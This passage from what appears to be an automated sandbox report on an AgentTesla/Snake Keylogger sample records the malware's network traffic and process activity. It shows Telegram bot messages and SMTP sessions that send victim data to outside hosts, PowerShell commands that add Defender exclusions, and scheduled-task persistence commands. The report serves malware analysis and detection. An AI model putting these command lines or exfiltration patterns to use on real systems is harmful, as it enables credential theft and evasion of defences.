States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 13:42:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49807	149.154.167.220	443	3220	C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-22 13:42:36 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0ADate%20and%20Time:%2023/10/2024%20/%2002:42:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20066656%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-10-22 13:42:37 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 22 Oct 2024 13:42:36 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-22 13:42:37 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49813	188.114.96.3	443	2488	C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-22 13:42:37 UTC	87	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-22 13:42:37 UTC	890	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:37 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 29913 Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FB9L3qbtDlyUyScoRAYC93rCUh1N8H5K9gTruE45zMhdWc7YQXDF3WRhKBNKtyBPqTdjLPirvoGC60z3rP9bjVbDUPy4Gj%2FH8xM0Uei4vGTRVici0asRopiGzYYSbYcO995BE4lZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d69e9644cd42e51-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1598&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1792079&cwnd=251&unsent_bytes=0&cid=70ac7168e95c3bad&ts=155&x=0"
2024-10-22 13:42:37 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 13:42:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49825	188.114.96.3	443	2488	C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-22 13:42:39 UTC	63	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-22 13:42:39 UTC	894	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:39 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 29915 Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kt0Q5SearVQiyDvNk7pjychnQxTXfl1DB1oUOieaBynJyWyvbLPbZEW8dibzIadosW12NJ82A%2FOo0kB6jjWLiM8qdme%2Bg7xFPVL2ORJw5RMGlMOG5uBThww9sWwh%2FIUwnwGgmiTu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d69e96eaee4e80f-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1393&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2089466&cwnd=251&unsent_bytes=0&cid=a06f5818b969879c&ts=151&x=0"
2024-10-22 13:42:39 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 13:42:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	49830	149.154.167.220	443	2488	C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-22 13:42:40 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0ADate%20and%20Time:%2023/10/2024%20/%2002:32:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20066656%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-10-22 13:42:40 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 22 Oct 2024 13:42:40 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-22 13:42:40 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Oct 22, 2024 15:42:43.305406094 CEST	587	49847	208.91.199.223	192.168.2.6	220 us2.outbound.mailhostbox.com ESMTP Postfix
Oct 22, 2024 15:42:43.305649996 CEST	49847	587	192.168.2.6	208.91.199.223	EHLO 066656
Oct 22, 2024 15:42:43.463151932 CEST	587	49847	208.91.199.223	192.168.2.6	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Oct 22, 2024 15:42:43.464194059 CEST	49847	587	192.168.2.6	208.91.199.223	AUTH login c2VuZGVyQGluaG91c2VwaWNrLmNvbQ==
Oct 22, 2024 15:42:43.624629974 CEST	587	49847	208.91.199.223	192.168.2.6	334 UGFzc3dvcmQ6
Oct 22, 2024 15:42:45.468730927 CEST	587	49847	208.91.199.223	192.168.2.6	535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
Oct 22, 2024 15:42:45.468934059 CEST	49847	587	192.168.2.6	208.91.199.223	MAIL FROM:<sender@inhousepick.com>
Oct 22, 2024 15:42:45.628842115 CEST	587	49847	208.91.199.223	192.168.2.6	250 2.1.0 Ok
Oct 22, 2024 15:42:45.629019976 CEST	49847	587	192.168.2.6	208.91.199.223	RCPT TO:<inlogs@inhousepick.com>
Oct 22, 2024 15:42:45.806045055 CEST	587	49847	208.91.199.223	192.168.2.6	554 5.7.1 <inlogs@inhousepick.com>: Relay access denied
Oct 22, 2024 15:42:46.257414103 CEST	587	49867	208.91.199.223	192.168.2.6	220 us2.outbound.mailhostbox.com ESMTP Postfix
Oct 22, 2024 15:42:46.259242058 CEST	49867	587	192.168.2.6	208.91.199.223	EHLO 066656
Oct 22, 2024 15:42:46.417192936 CEST	587	49867	208.91.199.223	192.168.2.6	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Oct 22, 2024 15:42:46.417488098 CEST	49867	587	192.168.2.6	208.91.199.223	AUTH login c2VuZGVyQGluaG91c2VwaWNrLmNvbQ==
Oct 22, 2024 15:42:50.578232050 CEST	587	49867	208.91.199.223	192.168.2.6	334 UGFzc3dvcmQ6
Oct 22, 2024 15:42:52.469640970 CEST	587	49867	208.91.199.223	192.168.2.6	535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
Oct 22, 2024 15:42:52.536221981 CEST	49867	587	192.168.2.6	208.91.199.223	MAIL FROM:<sender@inhousepick.com>
Oct 22, 2024 15:42:52.697421074 CEST	587	49867	208.91.199.223	192.168.2.6	250 2.1.0 Ok
Oct 22, 2024 15:42:52.697593927 CEST	49867	587	192.168.2.6	208.91.199.223	RCPT TO:<inlogs@inhousepick.com>
Oct 22, 2024 15:42:52.876966000 CEST	587	49867	208.91.199.223	192.168.2.6	554 5.7.1 <inlogs@inhousepick.com>: Relay access denied

Target ID:	0
Start time:	09:42:16
Start date:	22/10/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe"
Imagebase:	0x570000
File size:	674'304 bytes
MD5 hash:	B2B44061F8271AD0F7D3A4FEBEB07751
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2149465805.0000000003951000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2149465805.0000000003951000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2149465805.0000000003951000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2149465805.0000000003951000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:42:17
Start date:	22/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe"
Imagebase:	0x730000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:42:17
Start date:	22/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:42:17
Start date:	22/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe"
Imagebase:	0x730000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:42:17
Start date:	22/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:42:17
Start date:	22/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xRAvleeiuDbJ" /XML "C:\Users\user\AppData\Local\Temp\tmp550.tmp"
Imagebase:	0x970000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:42:17
Start date:	22/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	09:42:17
Start date:	22/10/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe"
Imagebase:	0x580000
File size:	674'304 bytes
MD5 hash:	B2B44061F8271AD0F7D3A4FEBEB07751
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000009.00000002.4587075709.0000000000427000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.4587075709.0000000000427000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.4590760130.0000000002841000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	09:42:19
Start date:	22/10/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff717f30000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	09:42:20
Start date:	22/10/2024
Path:	C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe
Imagebase:	0xbc0000
File size:	674'304 bytes
MD5 hash:	B2B44061F8271AD0F7D3A4FEBEB07751
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	09:42:21
Start date:	22/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xRAvleeiuDbJ" /XML "C:\Users\user\AppData\Local\Temp\tmp16A5.tmp"
Imagebase:	0x970000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	09:42:22
Start date:	22/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	09:42:22
Start date:	22/10/2024
Path:	C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe"
Imagebase:	0x420000
File size:	674'304 bytes
MD5 hash:	B2B44061F8271AD0F7D3A4FEBEB07751
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	09:42:22
Start date:	22/10/2024
Path:	C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe"
Imagebase:	0x830000
File size:	674'304 bytes
MD5 hash:	B2B44061F8271AD0F7D3A4FEBEB07751
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000F.00000002.4591231709.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	12.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	135
Total number of Limit Nodes:	4

Executed Functions

Function 00D4D8D0 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00D4D95E
GetCurrentThread.KERNEL32 ref: 00D4D99B
GetCurrentProcess.KERNEL32 ref: 00D4D9D8
GetCurrentThreadId.KERNEL32 ref: 00D4DA31

Memory Dump Source

Source File: 00000000.00000002.2147457227.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_SecuriteInfo.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 4700b76b6003436c107a7f443799df19eee113415f5a2fa647379613ab145ead
Instruction ID: 7195d4ce19709963894f77581272ff7c151050d101b3797af7f3ccfca308eaee
Opcode Fuzzy Hash: 4700b76b6003436c107a7f443799df19eee113415f5a2fa647379613ab145ead
Instruction Fuzzy Hash: 595178B4901289CFEB54CFA9D548B9EBBF1EB88304F248459E009A73A0D7749848CF65

Function 00D4D8E0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00D4D95E
GetCurrentThread.KERNEL32 ref: 00D4D99B
GetCurrentProcess.KERNEL32 ref: 00D4D9D8
GetCurrentThreadId.KERNEL32 ref: 00D4DA31

Memory Dump Source

Source File: 00000000.00000002.2147457227.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_SecuriteInfo.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: aba88d95a3bbed1cb38770054455623f2014b1634b8cc846b370581fa425ed57
Instruction ID: ecc6b69455c1555410bf3936232e2162aa5fc1a8cce414fbb111c07b796022f9
Opcode Fuzzy Hash: aba88d95a3bbed1cb38770054455623f2014b1634b8cc846b370581fa425ed57
Instruction Fuzzy Hash: 325169B4900349CFEB14CFAAD548B9EBBF1EB88304F248459E009A73A0D7759988CF65

Function 04EE1B20 Relevance: 2.7, Strings: 2, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 04EE1B67
, xrefs: 04EE1B6E

Memory Dump Source

Source File: 00000000.00000002.2151062181.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ee0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 5a275e84971298fcaf154587c2901e6569e0765eb52adb56c78cd5921a1633d7
Instruction ID: 7ad2185bdcda0a7cf648bcd88fd25a8eb2c338418256ae9585cd2e0953a42eb7
Opcode Fuzzy Hash: 5a275e84971298fcaf154587c2901e6569e0765eb52adb56c78cd5921a1633d7
Instruction Fuzzy Hash: C371D034940701CFEB40EF29D4C5954B7F1FF85304B408AA9D949AB25AEB71F895CF80

Function 04EE0694 Relevance: 2.7, Strings: 2, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 04EE1B67
, xrefs: 04EE1B6E

Memory Dump Source

Source File: 00000000.00000002.2151062181.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ee0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 29be081b8f0af41357e875e3d118bf9a8886783c99ae32284b151eb955b43c3f
Instruction ID: d57769bfeb79f66864b58bf47f47c8c344cd00c4917af980fd7ec1e60fc7ab97
Opcode Fuzzy Hash: 29be081b8f0af41357e875e3d118bf9a8886783c99ae32284b151eb955b43c3f
Instruction Fuzzy Hash: 3E71BF35940701CFEB40EF29D4C5955B7F5FF85304B408AA9D949AB25AEB71F8A8CB80

Function 06CC4135 Relevance: 1.7, APIs: 1, Instructions: 245
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06CC4376

Memory Dump Source

Source File: 00000000.00000002.2152940183.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc0000_SecuriteInfo.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a2132ebcfe8e770d137f0390ba6e9fb6821c1ae600fe8fff2e2353990517fb5c
Instruction ID: 68b2fbaeb7ca52b705afae2b09724ebb0d03f6f18b8158603875797c6f55083b
Opcode Fuzzy Hash: a2132ebcfe8e770d137f0390ba6e9fb6821c1ae600fe8fff2e2353990517fb5c
Instruction Fuzzy Hash: 84914A71D00219CFEB54CFA8C8557DEBBF2AF48324F14C5A9E849A7240DB749A85CF91

Function 06CC4140 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06CC4376

Memory Dump Source

Source File: 00000000.00000002.2152940183.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc0000_SecuriteInfo.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d8a42b1392c6a2c373f26ae80c145648d997573004b10a4b375e013e6992302c
Instruction ID: 6ffbfae69b845693d926e9fdfa33481a99991fe1f6a0cf69d4ecca70367fb617
Opcode Fuzzy Hash: d8a42b1392c6a2c373f26ae80c145648d997573004b10a4b375e013e6992302c
Instruction Fuzzy Hash: 1F914A71D00219CFEB54CFA9C8517DEBBF2AF88320F14C5A9E809A7240DB749A85CF91

Function 00D4B237 Relevance: 1.7, APIs: 1, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00D4B49E

Memory Dump Source

Source File: 00000000.00000002.2147457227.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_SecuriteInfo.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 497b2b8c91ba9d103657309e11ae540e928be025b87066e5c5a21a4fe6a33bf8
Instruction ID: 519ccf57b7cf80f9b3cda553d40e048ca4f77ff41b2a84fa77d7a487866a5a28
Opcode Fuzzy Hash: 497b2b8c91ba9d103657309e11ae540e928be025b87066e5c5a21a4fe6a33bf8
Instruction Fuzzy Hash: 98814470A00B058FEB24DF6AD04579ABBF1FF88314F048A2ED48AD7A50D775E845CBA1

Function 00D44A3C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00D45ED9

Memory Dump Source

Source File: 00000000.00000002.2147457227.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_SecuriteInfo.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e8ffc4202a657a2f2e3196e07c88d11e8cf6b65a2d7cc27eaae3b2bc56e65820
Instruction ID: 923a894a9c2b83f568bc5a3466daa53f26264345ee94ef48104e07659beb5ce9
Opcode Fuzzy Hash: e8ffc4202a657a2f2e3196e07c88d11e8cf6b65a2d7cc27eaae3b2bc56e65820
Instruction Fuzzy Hash: 8D41D275C0071DCBEB24CFA9C84479EBBB5BF88304F20806AD509AB255DB756949CF61

Function 00D45E1C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00D45ED9

Memory Dump Source

